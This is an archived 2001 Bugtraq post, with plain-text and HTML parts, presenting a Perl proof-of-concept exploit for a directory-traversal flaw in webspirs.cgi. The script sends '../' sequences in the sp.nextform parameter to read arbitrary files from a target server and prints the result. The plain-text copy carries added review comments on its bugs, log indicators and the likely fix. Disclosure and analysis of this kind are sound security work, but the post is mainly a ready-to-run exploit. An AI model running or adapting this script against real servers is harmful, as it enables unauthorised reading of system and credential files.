[19978] in bugtraq
Webspirs remote script exploitation
daemon@ATHENA.MIT.EDU (Crono)
Sat Mar 31 22:19:34 2001
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0019_01C0BA20.AE9209A0"
X-MDaemon-Deliver-To: bugtraq@securityfocus.com
Message-ID: <001e01c0ba0f$fa63e3a0$65ad74a7@hell>
Date: Sat, 31 Mar 2001 20:25:09 +0200
Reply-To: Crono <crono@THEPENTAGON.COM>
From: Crono <crono@THEPENTAGON.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0019_01C0BA20.AE9209A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
This Perl script can be used to exploit the vulnerability in
webspirs.cgi on any machine where it is installed. The vulnerability allows
any file on the machine to be viewed, escaping the web root (a directory traversal).
#!/usr/bin/perl
# Remote Script to exploit bug in webspirs.cgi
# Affected systems: any system where webspirs.cgi is installed
#
# Using by default "/"
# Spain 10-3-2001 (Crono) (crono@thepentagon.com)
use LWP::UserAgent;
use Socket;
use Getopt::Std;
# Command-line handling for the proof-of-concept: parse the options, print a
# usage banner when they are missing, then hand off to conectar().
# NOTE(review): every "=3D" and trailing "=20" in this listing is
# quoted-printable residue from the mail transport (this part is declared
# quoted-printable); they stand for "=" and a space and are not Perl syntax.
# The script has no "use strict" / "use warnings", so %args, $host and $v
# are package globals.

# -h, -v and -c each take a value; -c is accepted but never read in this listing.
getopts("h:v:c:", \%args);
# NOTE(review): the two tests are joined by the comma operator rather than a
# logical operator, so the left test is evaluated and discarded and only the
# -v test decides whether the usage text is shown.
# The usage text calls the script "unicode.pl" - presumably a leftover from a
# different tool; the post does not say.
if (!defined $args{h}, !defined $args{v}) {
print qq~
-=3D- WebSpirs Remote Script -=3D- =20
by Crono
Usage: perl unicode.pl -h <host> -v <file>
~;exit;
}
# Copy the options into globals that conectar() reads directly.
$host=3D$args{h};
$v=3D$args{v};
# NOTE(review): comma operator again - the condition is just the truth of
# $args{v}; "defined $args{h}" has no effect on it.
if (defined $args{h}, $args{v}){
# Called with a leading "&" and no parentheses, so conectar sees the caller's
# @_ (it does not use it).
&conectar; }
################
# conectar: send one HTTP GET to webspirs.cgi on $host with a
# directory-traversal value in the sp.nextform parameter and print whatever
# the server returns. Reads the globals $host and $v; takes no arguments.
#
# What the request looks like from the defending side:
#  - the query string is "sp.nextform=" followed by "../" sequences and a
#    path, so access-log entries for /cgi-bin/webspirs.cgi whose sp.nextform
#    value contains ".." are the thing to search for;
#  - no agent string is set, so LWP sends its default
#    "libwww-perl/<version>" User-Agent;
#  - the URL is built from the resolved IP address, not the host name.
# NOTE(review): the post shows only the client side. Presumably the CGI uses
# sp.nextform as a file name without confining it to its own form directory;
# the fix belongs there (canonicalise the resolved path and reject anything
# outside the expected directory, or accept only known form names) - confirm
# against the vendor's advisory.
sub conectar {
################
print " - WebSpirs Remote Script Facility - -=3D- By Crono
-=3D-\n";
print "\nAttemtping to get: $v\n";
# Resolve the host name to a packed address and back to a dotted-quad string.
# There is no check that the lookup succeeded.
my $server =3D inet_ntoa(inet_aton($host));
# Five ".." components, then $v appended exactly as typed (no URL-escaping,
# no validation). $v is presumably expected to start with "/" - the header
# comment's 'Using by default "/"' is ambiguous on this.
my $url =3D "/cgi-bin/webspirs.cgi?sp.nextform=3D".
"../../../../..".
"$v";
# Indirect-object constructor calls; a default LWP client, plain HTTP.
my $ua =3D new LWP::UserAgent;
my $req =3D new HTTP::Request GET =3D>
"http://".$server.$url;
my $res =3D $ua->request($req);
# Server response header, numeric status code, and response body.
my $web =3D $res->server;
my $code =3D $res->code;
my $content =3D $res->content;
# The status is printed but never tested, so an error page is shown the same
# way as a successful response.
print "$web\t$code\n";
print "$content\n";
}
# Saludos para la peña que me conoce (ellos saben quien son) :)
------=_NextPart_000_0019_01C0BA20.AE9209A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#c8e0d8>
<DIV><FONT face=3DArial size=3D2>This Perl script can be used to exploit =
the=20
vulnerability on webspirs.cgi, installed on any machine. The =
vulnerability allow=20
to view any file on the machine, breaking the webroot.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#!/usr/bin/perl<BR># Remote =
Script to exploit=20
bug in webspirs.cgi<BR># Affected systems: any where webspirs.cgi =
are=20
installed<BR># <BR># Using by default "/"<BR># Spain=20
10-3-2001 (Crono) (<A=20
href=3D"mailto:crono@thepentagon.com">crono@thepentagon.com</A>)</FONT></=
DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>use LWP::UserAgent;<BR>use =
Socket;<BR>use=20
Getopt::Std;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>getopts("h:v:c:", \%args);<BR>if =
(!defined=20
$args{h}, !defined $args{v}) {<BR>print=20
qq~<BR> =
=20
-=3D- WebSpirs Remote Script -=3D- =20
<BR> &nb=
sp; &nbs=
p; =20
by Crono</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> Usage: perl =
unicode.pl -h=20
<host> -v=20
<file><BR>~;exit;<BR> }<BR>$host=3D$args{h};<BR>$v=3D$args{v};=
<BR>if=20
(defined $args{h}, $args{v}){<BR>&conectar; }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>################<BR>sub =
conectar =20
{<BR>################</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print " - WebSpirs Remote Script =
Facility=20
- =
-=3D- By=20
Crono<BR>-=3D-\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print "\nAttemtping to get: =
$v\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>my $server =3D =
inet_ntoa(inet_aton($host));<BR>my=20
$url =3D=20
"/cgi-bin/webspirs.cgi?sp.nextform=3D".<BR>"../../../../..".<BR>"$v";</FO=
NT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>my $ua =3D new LWP::UserAgent;<BR>my =
$req =3D new=20
HTTP::Request GET =3D><BR>"<A=20
href=3D'http://".$server.$url'>http://".$server.$url</A>;<BR>my $res =3D =
$ua->request($req);<BR>my $web =3D $res->server;<BR>my $code =3D=20
$res->code;<BR>my $content =3D $res->content;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>print "$web\t$code\n";<BR>print=20
"$content\n";</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>}<BR># Saludos para la pe=A4a que me =
conoce (ellos=20
saben quien son) :)</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_0019_01C0BA20.AE9209A0--